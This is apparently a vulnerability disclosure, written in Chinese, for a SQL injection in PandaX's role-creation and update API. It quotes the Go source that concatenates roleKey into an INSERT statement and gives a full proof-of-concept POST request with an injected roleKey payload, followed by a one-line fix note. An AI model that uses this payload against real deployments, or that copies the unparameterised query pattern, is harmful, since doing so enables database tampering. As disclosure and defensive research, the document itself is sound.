pandax sql 注入

[L1nyz-tel]

pandax sql 注入

修改角色信息这里

PandaX/apps/system/router/role.go

Lines 49 to 61 in 3d26520

	ws.Route(ws.POST("").To(func(request *restful.Request, response *restful.Response) {
	restfulx.NewReqCtx(request, response).WithLog("添加角色信息").Handle(s.InsertRole)
	}).
	Doc("添加角色信息").
	Metadata(restfulspec.KeyOpenAPITags, tags).
	Reads(entity.SysRole{}))
	ws.Route(ws.PUT("").To(func(request *restful.Request, response *restful.Response) {
	restfulx.NewReqCtx(request, response).WithLog("修改角色信息").Handle(s.UpdateRole)
	}).
	Doc("修改角色信息").
	Metadata(restfulspec.KeyOpenAPITags, tags).
	Reads(entity.SysRole{}))

进入 InsertRole 或者 UpdateRole 这两个函数

PandaX/apps/system/api/role.go

Lines 51 to 82 in 3d26520

	// InsertRole 创建角色
	func (r *RoleApi) InsertRole(rc *restfulx.ReqCtx) {
	var role entity.SysRole
	restfulx.BindJsonAndValid(rc, &role)
	role.CreateBy = rc.LoginAccount.UserName
	if role.DataScope == "" {
	role.DataScope = "0"
	}
	// 添加角色对应的菜单
	insert := r.RoleApp.Insert(role)
	role.RoleId = insert.RoleId
	r.RoleMenuApp.Insert(insert.RoleId, role.MenuIds)
	//添加权限
	ca := casbin.CasbinService{ModelPath: global.Conf.Casbin.ModelPath}
	ca.UpdateCasbin(role.RoleKey, role.ApiIds)
	}
	// UpdateRole 修改用户角色
	func (r *RoleApi) UpdateRole(rc *restfulx.ReqCtx) {
	var role entity.SysRole
	restfulx.BindJsonAndValid(rc, &role)
	role.UpdateBy = rc.LoginAccount.UserName
	// 修改角色
	r.RoleApp.Update(role)
	// 删除角色的菜单绑定
	r.RoleMenuApp.DeleteRoleMenu(role.RoleId)
	// 添加角色菜单绑定
	r.RoleMenuApp.Insert(role.RoleId, role.MenuIds)
	//修改api权限
	ca := casbin.CasbinService{ModelPath: global.Conf.Casbin.ModelPath}
	ca.UpdateCasbin(role.RoleKey, role.ApiIds)
	}

之后会进入 r.RoleMenuApp.Insert(insert.RoleId, role.MenuIds)
此处存在 sql 语句拼接，没有使用预编译，可以进行拼接执行 sql 注入

PandaX/apps/system/services/role_menu.go

Lines 31 to 53 in 3d26520

	func (m *sysRoleMenuImpl) Insert(roleId int64, menuId []int64) bool {
	var role entity.SysRole
	biz.ErrIsNil(global.Db.Table("sys_roles").Where("role_id = ?", roleId).First(&role).Error, "查询角色失败")
	var menu []entity.SysMenu
	biz.ErrIsNil(global.Db.Table("sys_menus").Where("menu_id in (?)", menuId).Find(&menu).Error, "查询菜单失败")
	//拼接 sql 串
	sql := "INSERT INTO sys_role_menus (role_id,menu_id,role_name) VALUES "
	for i := 0; i < len(menu); i++ {
	if len(menu)-1 == i {
	//最后一条数据 以分号结尾
	sql += fmt.Sprintf("(%d,%d,'%s');", role.RoleId, menu[i].MenuId, role.RoleKey)
	} else {
	sql += fmt.Sprintf("(%d,%d,'%s'),", role.RoleId, menu[i].MenuId, role.RoleKey)
	}
	}
	biz.ErrIsNil(global.Db.Exec(sql).Error, "新增角色菜单失败")
	return true
	}

漏洞验证

POST http://127.0.0.1:7788/system/role HTTP/1.1
Host: 127.0.0.1:7788
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Origin: http://127.0.0.1:7788
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Content-Type: application/json
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-TOKEN: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVc2VySWQiOjEsIlRlbmFudElkIjowLCJPcmdhbml6YXRpb25JZCI6MiwiVXNlck5hbWUiOiJwYW5kYSIsIlJvbGVJZCI6MSwiUm9sZUtleSI6ImFkbWluIiwiRGVwdElkIjowLCJQb3N0SWQiOjQsImV4cCI6MTcxMDU5Mjk1MiwiaXNzIjoiUGFuZGFYIiwibmJmIjoxNzA5OTg3MTUyfQ.tz99RC1K83NjuNVNlw2p2Shq1gS1Y2MVTbbhR1_610Q
If-Modified-Since: Sat, 09 Mar 2024 08:08:22 GMT
Connection: close
Content-Length: 96

{"roleName":"11","roleKey":"tes12'),(114,514,'123');#","roleSort":2,"menuIds":[106],"apiIds":[]}

[PandaX-Go]

[fix]使用gorm对象存储 CreateInBatches